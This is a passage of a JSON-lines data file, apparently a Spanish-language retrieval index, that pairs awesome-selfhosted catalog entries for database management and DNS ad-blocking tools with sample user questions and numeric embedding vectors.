0.0376, -0.09492, -0.06689, -0.08946, 0.06236, 0.00826, -0.05604, -0.00461, -0.06855, -0.11351, 0.06057, 0.08238, 0.10414, 0.00516, -0.0076, 0.04373, -0.02302, -0.08924, -0.17618, -0.18458, -0.05906, -0.05706, -0.08814, 0.14571, -0.10595, 0.05135, 0.01462, -0.16725, -0.0204, -0.06816, 0.06769, 0.03985, -0.01635, -0.00628, -0.04737, -0.08716, 0.17401, -0.01741, 0.02373, -0.0317, -0.05362, 0.0225, -0.02071, 0.07399, -0.01863, 0.05712, 0.05585, -0.04707, 0.01151, -0.07267, 0.03436, 0.0267, -0.05721, 0.10307, 0.00751, -0.00636, -0.04426, 0.00241, -0.00868, 0.01867, -0.01725, 0.04631, 0.03479, 0.00232, -0.0623, -0.01151, -0.02779, 0.05021, -0.08596, -0.05583, 0.07355, 0.08198, -0.01411, 0.08375, -0.02117, -0.09863, -0.04109, 0.05191, 0.02927, -0.02107, -0.03944, -0.00475, 0.07786, -0.00777, -0.01934, -0.01461, -0.06423, 0.02247, -0.02488, 0.01231, -2e-05, -0.0467, -0.00778, -0.05412, 0.11743, 6e-05, -0.00518, -0.03127, -0.03416, -0.10837, -0.00629, 0.01703, 0.06624, 0.00069, -0.12127, 0.00198, -0.02039, -0.01546, 0.04274, -0.04014, -0.05447, 0.02483, -0.04087, 0.07101, 0.00638, -0.07729, -0.01252, 0.06842, -0.02351, 0.04279, 0.01583, -0.09404, -0.00981, 0.02014, -0.03141, -0.09393, 0.00864, 0.0061, -0.01056, 0.00821, 0.01755, 0.06291, -0.09103, 0.0584, -0.02095, 0.05809, 0.02561, 0.04375, 0.0593, 0.09447, -0.07578, 0.02373, 0.00468, -0.08346, -0.02027, -0.03467, -0.07607, -0.00998, -0.03567, 0.00823, -0.01918, 0.00606, -0.05863, 0.02328, -0.00386, -0.03167, -0.01223, -0.04457, 0.12621, 0.0445, -0.04413, 0.03872, -0.03823, -0.02154, -0.05184, 0.01968, -0.04692, -0.02987, -0.01029, -0.03628, -0.07582, 0.00198, 0.04697, -0.0726, 0.02399, 0.01534, -0.03568, 0.03745, -0.00148, 0.04729, 0.01462, 0.00573, -0.05134, -0.01289, 0.02851, -0.00426, -0.01325, -0.04207, 0.04408, 0.04407, -0.0163, 0.0061, -0.01801, 0.02184, -0.01237, -0.02039, 0.01506, 0.02418, -0.04031, 0.01864, -0.03104, 0.04337, -0.01518, -0.01418, -0.06517, -0.02748, -0.07112, 0.01661, 0.0675, -0.03944, -0.02148, -0.00996, -0.02658, -0.08008, 0.04711, -0.0336, -0.08357, -0.03943, -0.00748, 0.10224, -0.02245, -0.02708, -0.01277]} +{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: d9 β€” Turn SQL databases into secure APIs through an intuitive admin interface. Data platform and headless CMS (fork of Directus) [GPL-3.0, Nodejs]. Databunker β€” Network-based, self-hosted, GDPR compliant, secure database for personal data or PII [MIT, Docker]. Datasette β€” Explore and publish data with easy import and export and database management [Apache-2.0, Python/Docker]. Evidence β€” Code-based BI tool. Write reports using SQL and markdown and they render as a website [MIT, Nodejs]. LibreDB Studio β€” Browser-based SQL IDE for PostgreSQL, MySQL, Oracle, SQL Server, SQLite, MongoDB and Redis, with an optional AI assistant that writes SQL from natural language (alternative to DataGrip, DBeaver) [MIT, Docker/K8S]. Limbas β€” Database framework for creating database-driven business applications. As a graphical database frontend, it enables the efficient processing of data stocks and the flexible development of comfortable database applications [GPL-2.0, PHP].", "indexar": "cual programa puedo usar para crear aplicaciones empresariales impulsadas por bases de datos desde un frontend grΓ‘fico?", "v": [-0.03005, 0.09549, -0.04763, -0.24537, 0.11578, -0.08515, 0.05089, -0.04133, -0.18026, -0.0564, -0.08255, -0.14369, -0.19153, -0.09112, -0.05977, 0.05032, 0.04201, -0.14906, 0.03556, -0.07356, 0.01901, 0.00381, -0.12391, -0.09464, -0.13451, 0.0598, -0.05301, -0.07398, -0.10254, 0.03198, -0.0138, -0.00943, 0.07895, -0.03402, -0.1464, -0.08586, -0.0036, -0.00395, -0.01818, -0.01306, 0.01899, 0.00025, -0.13819, -0.00414, 0.17051, -0.00664, 0.03219, -0.03382, -0.08282, -0.07055, 0.02338, -0.02681, -0.08346, -0.01753, 0.04248, -0.11423, 0.05349, -0.17394, -0.04649, 0.06967, -0.03584, 0.09772, 0.01484, 0.01858, 0.00364, -0.07971, 0.12162, 0.01895, -0.05573, 0.05911, 0.02579, 0.06278, -0.00981, -0.06129, 0.12138, 0.03677, -0.00907, -0.02246, 0.00708, 0.00949, -0.04915, -0.00807, -0.06484, 0.08237, -0.05577, -0.08643, 0.0218, 0.08128, -0.02893, -0.03994, 0.04705, -0.00176, -0.07572, 0.00262, 0.02584, -0.01577, 0.04541, 0.0003, 0.05113, 0.05763, -0.03704, -0.05067, -0.08529, -0.03043, 0.02243, 0.00378, 0.05104, -0.05758, -0.09534, 0.03161, -0.03023, -0.0756, 0.0003, 0.04285, -0.01478, 0.02661, 0.02959, -0.07049, -0.00131, -0.10186, 0.02102, 0.01216, -0.00039, 0.02589, 0.00162, -0.01226, 0.02163, 0.16422, -0.02914, 0.05808, 0.00108, -0.06416, -0.04807, -0.02324, -0.09009, 0.0173, -0.01541, -0.0137, 0.04727, -0.07048, 0.01938, 0.13815, -0.0057, 0.04001, 0.0408, 0.02632, -0.00366, -0.04448, -0.03934, 0.06707, 0.04139, -0.03011, -0.04759, 0.02647, -0.09258, -0.02429, 0.02938, -0.05922, -0.0343, 0.00394, -0.02952, 0.07367, -0.05408, 0.01918, 0.04036, -0.14492, -0.04808, 0.04752, 0.05552, 0.14836, -0.04137, 0.10852, 0.058, -0.07331, 0.13692, -0.02303, -0.06461, -0.06975, -0.07585, -0.06573, -0.02599, -0.04477, 0.05098, 0.02776, -0.00091, -0.05849, 0.02938, 0.01439, 0.02577, 0.01275, -0.11405, 0.12069, 0.03739, -0.04084, 0.05601, -0.06455, 0.0604, 1e-05, 0.031, -0.04822, -0.04015, -0.02206, -0.06905, -0.00551, 0.0644, 0.07517, -0.00911, 0.01766, 0.04132, 0.05082, -0.0167, -0.01415, 0.00228, 0.00814, -0.01497, -0.05063, 0.00285, 0.03219, 0.04525, 0.01498, -0.02731, -0.02134, 0.00915, 0.03086, -0.02386, -0.00208, 0.02676, 0.01048, -0.01671, -0.03037, 0.03619, -0.01319, 0.01746, -0.03042, -0.00212, -0.00789, -0.02385, -0.03579, -0.03046, -0.08195, -0.01009, 0.08661, -0.03409, -0.02581, -0.02642, -0.01744, -0.0699, -0.0056, -0.03283, -0.08547, -0.02598, 0.00662, 0.03406, -0.02669, 0.01772, 0.02088]} +{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: d9 β€” Turn SQL databases into secure APIs through an intuitive admin interface. Data platform and headless CMS (fork of Directus) [GPL-3.0, Nodejs]. Databunker β€” Network-based, self-hosted, GDPR compliant, secure database for personal data or PII [MIT, Docker]. Datasette β€” Explore and publish data with easy import and export and database management [Apache-2.0, Python/Docker]. Evidence β€” Code-based BI tool. Write reports using SQL and markdown and they render as a website [MIT, Nodejs]. LibreDB Studio β€” Browser-based SQL IDE for PostgreSQL, MySQL, Oracle, SQL Server, SQLite, MongoDB and Redis, with an optional AI assistant that writes SQL from natural language (alternative to DataGrip, DBeaver) [MIT, Docker/K8S]. Limbas β€” Database framework for creating database-driven business applications. As a graphical database frontend, it enables the efficient processing of data stocks and the flexible development of comfortable database applications [GPL-2.0, PHP].", "indexar": "como gestiono o expulso datos de forma sencilla si ya tengo mi propia base de datos?", "v": [-0.14048, 0.06383, -0.06338, -0.17941, 0.01616, -0.05426, -0.00162, -0.1, -0.15241, -0.0149, -0.08989, -0.0632, -0.03679, -0.06337, 0.04862, -0.06868, 0.10819, -0.10644, -0.03776, -0.11149, -0.0792, -0.06577, -0.01934, -0.05369, -0.10956, 0.0037, 0.08061, -0.03068, -0.11652, 0.14811, 0.02648, -0.04329, -0.06738, -0.03179, -0.01063, 0.08087, -0.0574, 0.07521, -0.0062, -0.05691, 0.00162, -0.01732, -0.00486, 0.13511, 0.06462, 0.01255, -0.02715, 0.05119, 0.01231, -0.06144, -0.03604, -0.01789, -0.08771, -0.06828, -0.0303, -0.10979, 0.12757, -0.08642, 0.10026, 0.0514, -0.03141, 0.02511, 0.079, 0.13026, -0.00929, -0.04975, 0.10769, 0.00105, -0.03674, 0.08298, 0.02802, 0.11858, -0.0325, -0.04615, 0.12512, -0.13134, 0.15089, 0.01687, -0.02057, 0.02766, -0.12234, -0.06134, -0.07645, -0.03105, -0.07593, 0.02456, 0.04364, -0.04188, -0.06226, 0.02319, 0.03701, -0.02061, -0.07819, 0.00798, -0.04151, 0.0894, -0.08876, -0.01214, -0.03934, 0.02302, -0.05069, 0.12347, -0.05082, 0.06983, 0.08316, 0.05401, 0.06191, -0.00468, -0.12807, 0.00171, -0.07089, -0.02466, -0.02026, -0.05816, 0.06207, -0.02411, -0.01788, 0.00759, -0.01405, 0.03693, -0.00257, -0.08919, 0.14255, -0.06735, -0.01868, -0.06412, -0.07645, 0.06287, 0.07399, 0.06779, -0.03687, -0.02095, -0.02957, 0.00339, 0.07485, 0.08372, -0.09654, -0.01189, 0.05167, -0.13636, -0.06518, 0.11593, -0.11279, -0.02102, 0.06679, -0.05322, 0.03213, 0.11972, -0.06171, -0.01445, -0.02151, 0.01831, 0.091, 0.07787, -0.11603, 0.06221, 0.04528, -0.04954, 0.01145, -0.02659, 0.02175, 0.00625, -0.06235, 0.06944, 0.05323, -0.03376, 0.05983, -0.00262, 0.02658, 0.03047, -0.09713, 0.01281, 0.03746, -0.07743, 0.06217, -0.06433, -0.08626, -0.10292, -0.05584, 0.02149, 0.04729, 0.00488, -0.008, -0.00067, -0.00884, -0.0532, 0.01178, -0.01759, 0.03908, -0.04416, 0.02418, 0.06305, 0.05856, -0.03733, 0.04122, -0.05561, -0.03296, 0.02896, 0.04396, 0.0489, -0.04733, 0.02019, -0.01485, 0.03529, -0.04365, 0.07178, -0.0509, -0.06755, 0.05501, -0.05891, 0.02669, 0.00981, 0.06387, -0.01493, -0.00868, -0.02675, 0.09265, -0.01172, 0.02274, -0.03058, -0.0727, 0.05816, 0.09391, -0.00359, -0.03387, 0.00782, 0.02345, 0.0101, 0.02197, -0.01278, 0.02652, -0.03149, 0.02311, -0.01446, 0.04796, -0.00902, -0.02155, -0.00853, -0.01298, -0.05886, 0.06284, 0.02608, -0.0504, -0.04661, 0.00527, 0.00522, -0.08133, 0.06182, 0.00238, -0.0345, 0.0034, -0.06535, 0.02222, -0.00626, -0.02957, -0.03792]} +{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Mathesar β€” Intuitive UI to manage data collaboratively, for users of all technical skill levels. Built on Postgres – connect an existing DB or set up a new one [GPL-3.0, Docker/Python]. OrcaQ β€” Modern database client and IDE for managing, querying, and exploring multiple database types with built-in AI assistant [MIT, Nodejs/deb/Docker]. StackRender β€” Database schema design and SQL migration generator supporting PostgreSQL, MySQL, MariaDB, SQLite, SQL Server, and Oracle [AGPL-3.0, Nodejs/Docker].", "indexar": "que programa es para gestionar datos colaborativamente con una interfaz sencilla", "v": [0.11274, 0.09411, -0.11488, -0.28681, 0.1358, -0.13032, -0.02752, 0.01937, -0.08827, 0.00377, -0.01101, -0.12882, -0.02033, -0.05846, 0.04537, 0.04941, 0.18417, -0.14107, -0.03134, -0.04127, -0.0378, 0.08036, 0.00107, -0.06721, -0.05023, -0.07342, 0.03886, -0.08338, -0.00793, 0.02604, 0.03292, -0.10196, 0.02699, -0.03889, -0.00424, 0.06692, -0.02447, 0.01335, 0.07421, -0.12344, -0.04511, 0.01894, -0.07507, 0.10219, 0.12843, 0.06111, -0.04749, -0.02921, 0.01754, 0.02478, -0.08285, -0.04681, 0.00101, -0.01232, 0.00171, -0.06445, 0.05543, -0.20737, -0.04262, 0.02572, -0.08399, 0.08098, -0.04512, 0.05253, 0.06115, 0.01314, 0.0761, 0.02145, -0.01343, 0.2115, 0.05972, 0.13753, -0.02591, -0.0914, 0.06468, -0.01126, 0.05701, 0.03174, 0.03143, 0.00902, 0.04778, 0.00149, 0.065, 0.04669, 0.02036, 0.02809, 0.09229, -0.06143, -0.04186, 0.01033, 0.00171, -0.01481, 0.00974, -0.07014, 0.11632, 0.06202, 0.08423, 0.01015, -0.02559, 0.01075, -0.01555, -0.00831, -0.15602, 0.07083, -0.04204, 0.10244, 0.02212, 0.00164, -0.11117, 0.01029, 0.04172, 0.01129, 0.04607, -0.01931, -0.02276, 0.01053, 0.00103, -0.00962, 0.02784, -0.0743, -0.02734, -0.05285, -0.0124, 0.01395, 0.08502, -0.01728, -0.03185, 0.12652, 0.03084, 0.03606, -0.07913, 0.00749, -0.03324, -0.00272, 0.03143, 0.02307, -0.10429, -0.02988, 0.01505, -0.13084, -0.00241, 0.09233, 0.02718, 0.00772, 0.02025, -0.08359, 0.06716, 0.00824, 0.04025, 0.10796, 0.10373, -0.02139, -0.00256, 0.04291, -0.09736, 0.01947, 0.0535, -0.00251, -0.10486, -0.00863, -0.02107, -0.01206, -0.08691, 0.03963, 0.06289, -0.09017, -0.00932, 0.04589, 0.07176, 0.04862, -0.02466, 0.07443, 0.09001, -0.08016, -0.00017, 0.00687, -0.04939, -0.14594, -0.01575, -0.05046, -0.02294, 0.00053, 0.06817, 0.0044, -0.02544, -0.04295, -0.05385, 0.05402, -0.04506, -0.0418, 0.01418, 0.1278, 0.05866, -0.02495, 0.05755, -0.03813, -0.00257, 0.02223, -0.01275, 0.00283, 0.01625, 0.0345, 0.04305, 0.00555, -0.00627, 0.11063, -0.02458, 0.01541, 0.11037, 0.04208, -0.03187, -0.0177, 0.03377, 0.01511, -0.03917, -0.04151, -0.00836, 0.03329, 0.04744, 0.00579, -0.04957, -0.0206, 0.05799, -0.01347, 0.00948, -0.05894, 0.04827, 0.068, -0.01094, -0.02645, -0.01785, -0.06584, 0.03106, -0.00438, 0.01379, -0.02426, -0.02023, -0.05232, -0.01626, -0.06808, -0.00505, 0.02634, -0.00505, -0.04476, -0.01782, -0.02426, -0.07962, 0.01237, 0.01121, -0.02258, -0.03583, -0.00875, 0.03137, 0.00651, 0.00978, -0.00632]} +{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Mathesar β€” Intuitive UI to manage data collaboratively, for users of all technical skill levels. Built on Postgres – connect an existing DB or set up a new one [GPL-3.0, Docker/Python]. OrcaQ β€” Modern database client and IDE for managing, querying, and exploring multiple database types with built-in AI assistant [MIT, Nodejs/deb/Docker]. StackRender β€” Database schema design and SQL migration generator supporting PostgreSQL, MySQL, MariaDB, SQLite, SQL Server, and Oracle [AGPL-3.0, Nodejs/Docker].", "indexar": "con que puedo conectar mi base de datos existente y explorar sus consultas con ayuda de IA", "v": [0.03661, 0.22931, -0.27681, -0.07393, 0.08428, -0.06791, -0.04085, 0.01045, -0.16908, -0.08412, -0.14317, -0.15925, -0.04627, 0.01384, -0.04455, -0.0785, 0.08983, -0.00284, -0.01656, -0.08722, 0.06925, 0.01841, -0.0985, 0.02272, -0.1701, 0.0237, 0.01746, -0.04078, -0.01315, -0.02107, -0.04404, -0.03015, -0.07439, 0.10274, -0.03956, -0.06093, -0.01064, 0.10292, 0.02027, -0.09675, -0.02515, -0.05529, 0.00468, 0.04998, 0.11302, 0.04607, -0.04452, -0.05484, -0.04273, 0.01185, -0.16103, -0.05084, -0.17437, -0.09523, -0.0652, -0.04838, 0.11193, -0.12511, 0.04098, 0.0395, -0.10114, -0.0305, -0.01074, 0.01549, 0.07565, 0.00518, 0.05128, -0.03725, -0.07683, 0.09731, -0.05649, 0.06235, -0.0943, -0.05849, 0.00027, 0.01305, 0.10482, -0.08639, 0.11426, 0.01602, -0.0036, 0.03079, -0.0451, -0.02365, -0.05421, -0.00438, 0.03173, -0.00033, 0.00668, -0.03683, 0.05679, -0.05064, -0.04936, 0.00721, -0.03738, 0.04942, -0.02893, -0.05255, 0.00148, -0.00619, 0.02884, 0.0207, -0.03216, 0.14002, 0.06373, -0.00902, 0.12467, -0.04197, -0.11111, 0.01205, -0.0348, -0.01957, -0.06692, -0.09238, -0.01228, -0.03877, -0.10236, -0.02241, -0.0539, -0.01649, 0.00369, 0.0294, 0.02131, 0.02324, -0.00477, -0.03805, -0.0589, 0.06398, 0.08545, 0.04332, 0.01479, 0.05557, -0.04465, -0.09505, 0.13675, 0.06092, -0.05007, -0.07276, 0.0284, -0.01891, 0.00653, 0.02201, 0.0252, -0.02213, 0.11414, -0.02107, -0.00374, 0.04779, -0.05872, 0.01137, -0.02363, 0.03906, 0.07274, 0.11947, -0.06186, 0.02708, 0.0911, 0.02888, -0.0093, 0.05102, 0.03991, 0.09571, -0.00125, -0.03701, 0.00519, -0.03585, -0.01682, -0.01359, 0.05717, 0.04637, -0.07299, 0.0309, -0.00767, -0.04589, -0.02641, -0.03394, -0.0359, -0.06951, 0.00165, -0.06037, -0.03911, -0.04719, -0.02418, -0.062, -0.03143, -0.02076, 0.00605, -0.04216, 0.00929, -0.01427, -0.00872, 0.05185, 0.02899, 0.01708, 0.0256, -0.11648, -0.00477, 0.00368, 0.03715, -0.01125, -0.05191, 0.05032, -0.0305, -0.00282, -0.01809, 0.04776, -0.04795, 0.00159, -0.01371, -0.05763, 0.03733, -0.02064, 0.08534, -0.04476, -0.09582, 0.00809, 0.04206, -0.04425, -0.00687, -0.01029, -0.05768, 0.07572, 0.0538, 0.01151, -0.0264, 0.00738, 0.05322, -0.01412, 0.02617, 0.00408, 0.02529, 0.00349, 0.01187, -0.03303, 0.04296, 0.02544, 0.00684, -0.05881, -0.03726, -0.02522, 0.04969, 0.08129, -0.00133, -0.03625, 0.03738, -0.04836, -0.11001, 0.06571, -0.0171, -0.07524, -0.03877, 0.05633, 0.07386, -0.06284, 0.07476, -0.01983]} +{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Mathesar β€” Intuitive UI to manage data collaboratively, for users of all technical skill levels. Built on Postgres – connect an existing DB or set up a new one [GPL-3.0, Docker/Python]. OrcaQ β€” Modern database client and IDE for managing, querying, and exploring multiple database types with built-in AI assistant [MIT, Nodejs/deb/Docker]. StackRender β€” Database schema design and SQL migration generator supporting PostgreSQL, MySQL, MariaDB, SQLite, SQL Server, and Oracle [AGPL-3.0, Nodejs/Docker].", "indexar": "cual es la herramienta mejor para diseΓ±ar esquemas de bases de datos y generar migraciones SQL", "v": [0.01611, -0.05869, -0.15638, -0.19138, 0.05641, -0.14408, -0.08283, -0.08488, -0.07767, -0.04898, -0.08017, -0.06051, -0.04744, -0.18864, 0.09346, 0.03752, 0.07306, -0.10872, -0.10869, 0.00017, 0.05252, -0.0332, 0.02566, -0.04693, -0.19025, -0.10498, 0.05542, -0.00778, -0.13232, 0.09892, 0.0153, 0.00275, 0.0528, -0.05868, 0.00253, -0.02342, -0.06705, 0.10055, -0.03786, -0.11846, -0.06574, 0.02925, -0.14771, 0.04413, 0.03233, -0.06014, -0.04037, 0.01288, -0.03577, -0.04759, -0.09407, -0.01359, -0.08731, -0.05815, 0.00046, -0.04952, 0.18461, -0.12855, 0.07152, 0.07401, -0.10418, 0.03479, 0.00729, -0.02188, -0.02064, -0.0624, -0.04324, -0.06845, -0.04187, 0.10439, -0.00536, 0.0998, 0.00579, -0.04959, 0.0747, 0.00483, 0.07307, -0.00193, 0.02689, 0.05998, -0.03417, -0.04643, -0.13454, 0.11937, -0.04683, -0.04113, 0.05497, 0.01139, -0.03582, -0.03176, 0.04505, -0.03945, 0.02182, 0.00966, -0.00793, -0.00824, 0.03485, -0.08502, 0.07153, 0.06632, -0.03357, -0.06774, -0.07666, 0.13032, 0.0269, 0.07509, 0.11585, 0.02288, -0.0586, -0.00398, -0.01593, 0.00614, -0.03764, -0.02654, 0.01791, -0.07493, -0.02944, -0.02253, 0.02199, -0.02437, 0.05024, -0.00945, -0.04784, -0.01907, 0.02645, -0.05892, -0.03349, 0.06204, 0.02561, -0.00477, -0.02669, -0.03787, -0.12846, 0.04903, -0.00718, 0.06287, -0.01069, -0.15125, 0.02532, -0.11283, -0.01562, 0.064, -0.02243, -0.04964, -0.02594, 0.04045, 0.06411, 0.0237, -0.10183, 0.04057, -0.01761, 0.03847, 0.11437, -0.00266, -0.11652, 0.04596, -0.04224, -0.03431, -0.09096, 0.05416, 0.00054, 0.05878, 0.00571, 0.01398, 0.05224, -0.06857, 0.06567, 0.01366, 0.06331, 0.04417, 0.05036, 0.03121, 0.06139, -0.06806, 0.01803, -0.05588, -0.11263, -0.11406, -0.04767, -0.07775, -0.02152, 0.03052, -0.03313, -0.04884, 0.00909, -0.057, 0.03703, 0.01143, 0.03629, 0.00057, -0.02052, 0.08669, 0.00759, -0.04681, 0.03182, -0.0589, -0.00427, -0.03226, 0.0675, -0.04414, -0.05071, 0.00815, 0.01977, -0.06787, 0.01933, 0.10761, -0.05355, 0.00516, 0.01383, 0.03097, 0.00956, -0.05987, -0.0041, -0.04203, -0.02926, -0.01869, 0.03977, -0.00554, 0.05562, 0.01715, -0.04167, 0.06652, 0.03338, -0.02609, -0.05811, 0.01103, 0.03545, 0.00847, 0.0124, 0.01226, 0.03433, 0.00314, 0.01258, 0.00493, 0.0281, -0.00743, -0.01635, -0.0541, -0.01675, -0.11011, 0.04521, 0.07649, -0.043, -0.05571, 0.01972, -0.0469, -0.05352, 0.03143, 0.01138, -0.11217, -0.06186, 0.00964, 0.05148, -0.05759, 0.03092, -0.05101]} +{"tipo": "pregunta", "herramienta": "DNS", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / DNS", "tema": "dns", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / DNS: AdGuard Home β€” User-friendly ads & trackers blocking DNS server [GPL-3.0, Docker]. blocky β€” Fast and lightweight DNS proxy as ad-blocker for local network with many features (alternative to Pi-hole) [Apache-2.0, Go/Docker]. Maza ad blocking β€” Local ad blocker. Like Pi-hole but local and using your operating system [Apache-2.0, Shell]. Numa β€” Ad-blocking DNS resolver with DNSSEC-validating recursive resolution, DoH/DoT/Oblivious DoH, ephemeral overrides, and local service domains, in a single Rust binary (alternative to Pi-hole, AdGuard Home, NextDNS) [MIT, Rust/Docker/Nix]. Pi-hole β€” Blackhole for Internet advertisements with a GUI for management and monitoring [EUPL-1.2, Shell/PHP/Docker]. Technitium DNS Server β€” Authoritative/recursive DNS server with ad blocking functionality [GPL-3.0, Docker/C#].", "indexar": "que programa sirve para bloquear anuncios a nivel de red sin usar un servidor centralizado?", "v": [0.1868, 0.02105, -0.18559, -0.16122, 0.02641, -0.13142, -0.0292, -0.11265, -0.05559, -0.10051, -0.10442, -0.16449, -0.06392, -0.11532, 0.04372, 0.03361, -0.02664, -0.11732, 0.03222, 0.02423, 0.07503, -0.09356, 0.07779, 0.02245, -0.03788, 0.04419, 0.02328, -0.10765, -0.13416, -0.0629, -0.02678, -0.05462, 0.11211, -0.00608, 0.06196, -0.02871, -0.00492, 0.05721, -0.02924, 0.03586, 0.08313, 0.02697, -0.10561, 0.00589, 0.03486, 0.01433, 0.13443, -0.02891, 0.01082, -0.02932, -0.07869, -0.11918, -0.17228, -0.02906, 0.03081, -0.01638, 0.04942, 0.01951, -0.0797, -0.01692, -0.07575, -0.02482, 0.06117, -0.00988, 0.05375, 0.0156, -0.00402, 0.02488, -0.03645, 0.00152, -0.04719, 0.0083, 0.05065, -0.02546, 0.1118, 0.08914, -0.05124, -0.04398, 0.12197, -0.04203, 0.05149, 0.01741, 0.02393, 0.13466, -0.07997, -0.02693, 0.03914, -0.04047, -0.05076, -0.05566, 0.09038, 0.1139, -0.00319, 0.03245, 0.06648, -0.04038, 0.13406, 0.02318, 0.02828, 0.00372, 0.19552, -0.03448, -0.05092, 0.07766, 0.00229, 0.05869, 0.15667, -0.15148, 0.05419, -0.01092, 0.02463, -0.06501, -0.01897, -0.06659, -0.08493, -0.00779, -0.01502, 0.02631, 0.08325, -0.06691, -0.11591, -0.00842, -0.01863, 0.01074, 0.0407, -0.02354, -0.00159, 0.01601, -0.02037, 0.07008, -0.06572, 0.05298, -0.02149, -0.03232, -0.08452, -0.01983, 0.02061, -0.01422, -0.02685, -0.02311, 0.05966, 0.07004, -0.02639, -0.04411, 0.10491, 0.03985, 0.13991, -0.08694, -0.03973, 0.04783, 0.0247, -0.08466, -0.0152, 0.01651, -0.07866, -0.03567, 0.00881, -0.08909, -0.03564, 0.10661, -0.04027, 0.026, -0.07069, 0.06596, 0.05025, -0.01142, -0.01774, 0.03076, 0.1001, 0.07147, -0.01275, 0.04514, 0.00932, -0.11291, -0.0011, -0.04569, -0.03181, -0.05997, -0.012, -0.00262, -0.04773, 0.02208, -0.05487, 0.01175, -0.01454, 0.0046, -0.04354, -0.02247, 0.02165, -0.00973, -0.01592, 0.03161, -0.02251, 0.023, 0.02222, -0.05742, -0.07546, -0.02768, 0.01155, -0.06264, -0.03965, 0.0042, -0.03057, -0.04902, -0.02686, 0.04233, -0.05533, 0.04258, 0.00659, 0.13634, -0.03846, -0.05945, 0.08824, -0.00293, -0.02119, -0.02371, 0.04055, -0.03467, 0.00597, 0.0008, 0.00373, 0.00479, 0.00318, 0.03441, 0.0326, -0.03001, 0.03613, 0.00585, 0.05704, 0.04741, -0.05781, 0.00873, -0.00766, 0.01201, -0.00352, 0.01111, 0.0169, -0.0573, -0.04479, -0.13434, -0.03529, 0.0776, -0.0272, -0.04572, 0.02564, -0.0711, -0.04478, 0.01606, 0.00055, -0.05603, -0.01764, 0.02288, 0.02218, -0.03214, 0.04131, 0.0065]} +{"tipo": "pregunta", "herramienta": "DNS", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / DNS", "tema": "dns", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / DNS: AdGuard Home β€” User-friendly ads & trackers blocking DNS server [GPL-3.0, Docker]. blocky β€” Fast and lightweight DNS proxy as ad-blocker for local network with many features (alternative to Pi-hole) [Apache-2.0, Go/Docker]. Maza ad blocking β€” Local ad blocker. Like Pi-hole but local and using your operating system [Apache-2.0, Shell]. Numa β€” Ad-blocking DNS resolver with DNSSEC-validating recursive resolution, DoH/DoT/Oblivious DoH, ephemeral overrides, and local service domains, in a single Rust binary (alternative to Pi-hole, AdGuard Home, NextDNS) [MIT, Rust/Docker/Nix]. Pi-hole β€” Blackhole for Internet advertisements with a GUI for management and monitoring [EUPL-1.2, Shell/PHP/Docker]. Technitium DNS Server β€” Authoritative/recursive DNS server with ad blocking functionality [GPL-3.0, Docker/C#].", "indexar": "cual es una alternativa libre y ligera a Pi-hole para gestionar el bloqueo de publicidad en mi red local?", "v": [0.03647, -0.01439, -0.16211, -0.10158, -0.01515, -0.10794, -0.06635, 0.06663, -0.16769, -0.14249, 0.06197, -0.22962, 0.14321, -0.02274, 0.1709, -0.13905, -0.13571, -0.07081, 0.0927, -0.14208, -0.0795, 0.09421, 0.00121, 0.05521, 0.05913, -0.04022, 0.15449, 0.01938, -0.16069, -0.01267, -0.04961, -0.07629, 0.01056, -0.06853, -0.03743, 0.1302, 0.12944, 0.01913, 0.14909, -0.0021, 0.03389, -0.01446, -0.00131, 0.06451, -0.04338, -0.08515, 0.10156, 0.05691, 0.00498, 0.13639, -0.10398, -0.0038, -0.16772, -0.00926, 0.1965, 0.05386, 0.07005, -0.03992, -0.13425, 0.0331, -0.08415, -0.03815, 0.01427, 0.00249, 0.05352, 0.05775, 0.04592, -0.01903, -0.03578, 0.08294, 0.06455, -0.02355, 0.02255, 0.05369, -0.01815, 0.08636, -0.03766, 0.03768, 0.05152, 0.01152, 0.0812, 0.02701, 0.03091, 0.05704, 0.00049, 0.01689, -0.01924, -0.15711, -0.03645, 0.03069, 0.03767, -0.02226, 0.04087, 0.03406, -0.03685, -0.05486, -0.02431, 0.11382, -0.02246, -0.00384, 0.04269, -0.0074, -0.17058, -0.04021, 0.07438, 0.01719, -0.02428, -0.06494, -0.02617, 0.04411, 0.00471, -0.06138, -0.01057, 0.00236, 0.03531, -0.01344, 0.03217, 0.06155, -0.00306, -0.04832, -0.02399, -0.04765, -0.04408, -0.06455, 0.02996, 0.06389, -0.04695, 0.00156, -0.02023, 0.02983, -0.01529, 0.01784, -0.00434, -0.06715, -0.04304, -0.00752, 0.02913, -0.03705, -0.00692, 0.06061, -0.04003, -0.00767, -0.01687, -0.04542, 0.07649, -0.02865, -0.04768, -0.07136, -0.00985, 0.03514, -0.05528, -0.08588, -0.00848, 0.06466, -0.00388, 0.04693, -0.00676, 0.07479, -0.00182, 0.11137, 0.00708, -0.01702, -0.00439, 0.05709, 0.0228, -0.03071, 